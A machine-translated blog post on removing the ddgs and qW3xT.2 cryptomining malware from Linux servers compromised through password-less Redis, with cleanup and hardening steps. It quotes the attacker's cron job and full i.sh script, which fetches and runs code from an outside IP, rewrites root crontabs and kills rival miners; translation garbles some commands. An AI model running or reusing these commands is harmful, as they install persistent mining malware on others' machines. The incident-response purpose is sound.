Shulou(Shulou.com)06/02 Report--

Preface

With the frenzied hype of virtual currency, mining virus has become one of the most frequent attacks by lawbreakers. Virus disseminators can use personal computers or servers for mining. The specific phenomena are the high occupancy rate of computer CPU, the sudden drop in usable space of C disk, the increase of computer temperature, the increase of fan noise and so on.

This article mainly introduces the treatment methods of linux implanted ddgs and qW3xT.2 mining virus. Let's take a look at the detailed introduction.

The phenomenon after the invasion:

It is found that there are two abnormal processes, qW3xT.2 and ddgs, which consume a high amount of cpu,kill and will reappear after a while.

After kill dropped these two abnormal processes, after a period of time, he saw the following processes:

First of all, the timing task in / etc/sysconfig/crotnab did not find the timing script. Type crontab-e to find the timing task in it.

* / 5 * curl-fsSL http://149.56.106.215:8000/i.sh | sh queried 149.56.106.215 in the United States The content of the i.sh script is as follows: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "> / var/spool/cron/rootecho" * / 15 * curl-fsSL http://149.56.106.215:8000/i.sh | sh "> > / var/spool/cron/rootecho" * / 15 * wget-Q-O-http://149.56.106.215:8000/i.sh | | sh "> / var/spool/cron/rootmkdir-p / var/spool/cron/crontabsecho"> / var/spool/cron/crontabs/rootecho" * / 15 * curl-fsSL http://149.56.106.215:8000/i.sh | sh "> > / var/spool/cron/crontabs/rootecho" * / 15 * wget-Q-O-http://149.56.106.215:8000/i.sh | sh "> > / var | / spool/cron/crontabs/rootps auxf | grep-v grep | grep / tmp/ddgs.3013 | | rm-rf / tmp/ddgs.3013if [!-f "/ tmp/ddgs.3013"] Then wget-Q http://149.56.106.215:8000/static/3013/ddgs.$(uname-m)-O / tmp/ddgs.3013 curl-fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname-m)-o / tmp/ddgs.3013fichmod + x / tmp/ddgs.3013 & & / tmp/ddgs.3013ps auxf | grep-v grep | grep Circle_MI | awk'{print $2}'| xargs killps auxf | grep-v Grep | grep get.bi-chi.com | awk'{print $2}'| xargs killps auxf | grep-v grep | grep hashvault.pro | awk'{print $2}'| xargs killps auxf | grep-v grep | grep nanopool.org | awk'{print $2}'| xargs killps auxf | grep-v grep | grep minexmr.com | awk'{print $2}'| xargs killps auxf | grep-v grep | grep / boot/efi/ | awk'{print $2}'| xargs kill#ps auxf | grep-v grep | Grep ddg.2006 | awk'{print $2}'| kill#ps auxf | grep-v grep | grep ddg.2010 | awk'{print $2}'| kill

Treatment method:

1. Delete crontab-e

* / 5 * curl-fsSL http://149.56.106.215:8000/i.sh | sh

two。 Clear the secret-free login content set by hackers in / root/.ssh/authorized_keys

3. Modify redis password

4. Modify root and login account password

Security recommendations:

1. Configure the bind option, limit the IP that can connect to the Redis server, modify Redis's default port 6379 configuration authentication, that is, AUTH, and set the password, which will be saved in clear text in the Redis configuration file.

two。 Configure the rename-command configuration item "RENAME_CONFIG" so that even if there is unauthorized access, it can make it more difficult for an attacker to use config instructions

3. If you can block the redis public network in the firewall

Intrusion method:

Collected relevant information, learned that it is the use of redis vulnerabilities, did not set a password or password is too simple, resulting in intrusion. For specific ways, please refer to

Https://www.jb51.net/article/147375.htm

Reids modifies the password as follows:

Redis-cli-h 127.0.0.1-p 6379config get requirepass # # get the current password config set requirepass "yourpassword" # # set the current password, and then set it to default after the service is restarted, that is, no password

The permanent method is to open the redis configuration file redis.conf, find the password value and change the password, as follows:

Requirepass yourpassword # # Note here that there can be no spaces before the line

Summary

The above is the whole content of this article, I hope that the content of this article has a certain reference and learning value for your study or work, if you have any questions, you can leave a message and exchange, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.